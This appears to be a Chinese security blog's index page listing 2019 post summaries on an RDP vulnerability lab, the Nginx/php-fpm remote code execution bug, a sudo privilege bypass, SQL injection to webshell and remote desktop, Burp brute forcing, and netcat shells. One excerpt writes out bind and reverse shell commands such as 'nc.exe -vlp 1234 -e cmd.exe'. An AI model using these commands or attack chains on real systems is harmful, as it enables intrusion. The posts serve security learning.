2019年10月24日
摘要: 影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7环境:攻击机:kali ip:192.168.40.128靶机:windows sever2008 ip:192.168.40.131工具:360_RDP漏扫工具或者MSF框架PO 阅读全文
posted @ 2019-10-24 16:50 Lmos 阅读(820) 评论(0) 推荐(0) 编辑
摘要: 漏洞详情: Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。 影响范围: Nginx+php-fpm的服务器,在使用如下配 阅读全文
posted @ 2019-10-24 11:18 Lmos 阅读(2176) 评论(0) 推荐(0) 编辑
  2019年10月15日
摘要: 漏洞详情 sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。 系统平台 kali-Linux 软件版本 1.8.27 sudo作用 非root用户不需要知道root密码,就可以执行root才能执行的命令。 首先新建test用户 使用visudo命令添加规则,使得test用户可以执 阅读全文
posted @ 2019-10-15 23:11 Lmos 阅读(497) 评论(0) 推荐(0) 编辑
  2019年8月26日
摘要: 首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php 用蚁剑连接打开连接的终端 先看用户的权限 创建一个用户将它放入队列中 查看3389端口是否开启 0xd3d 16进制解码为3389 打开远程桌面连接输入新建的用户和密码 成功远程桌面连接 阅读全文
posted @ 2019-08-26 20:42 Lmos 阅读(632) 评论(0) 推荐(0) 编辑
  2019年8月20日
摘要: 首先burp抓包,将抓到的包放到intruder中 通过burp中自带的解码得知账号密码中有个“:“号 所以我们选择的数据类型为Custom iterator 第二条输入”:“ 将字典编码了对应爆破 因为爆破的时候会将字符URL编码了,所以需要将那个选项去掉 完成 爆破 这里调整可爆破MD5加密的。 阅读全文
posted @ 2019-08-20 11:55 Lmos 阅读(2344) 评论(0) 推荐(0) 编辑
  2019年8月17日
摘要: 正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击 阅读全文
posted @ 2019-08-17 13:08 Lmos 阅读(467) 评论(0) 推荐(0) 编辑
  2019年8月14日
摘要: <?php header('content-type:text/html; charset=utf-8'); $host = '58.com'; $hosts = gethostbyname('fuckfuck.'.$host) if ($hosts != 'fuckfuck.'.$host){ f 阅读全文
posted @ 2019-08-14 20:24 Lmos 阅读(334) 评论(0) 推荐(0) 编辑
  2019年8月13日
摘要: 选中线程设成1 阅读全文
posted @ 2019-08-13 18:06 Lmos 阅读(1021) 评论(1) 推荐(0) 编辑
  2019年8月12日
摘要: 通过钟馗之眼搜索目标网站的证书使用者找到信息泄露的网站, 点击上图中的edit会跳转 手工注入sql发现有效 that's all 阅读全文
posted @ 2019-08-12 17:59 Lmos 阅读(155) 评论(0) 推荐(0) 编辑
  2019年7月29日
摘要: 100 Continue 这个临时响应表明,迄今为止的所有内容都是可行的,客户端应该继续请求,如果已经完成,则忽略它。 101 Switching Protocol 该代码是响应客户端的 Upgrade 标头发送的,并且指示服务器也正在切换的协议。 102 Processing (WebDAV) 此 阅读全文
posted @ 2019-07-29 20:21 Lmos 阅读(357) 评论(0) 推荐(0) 编辑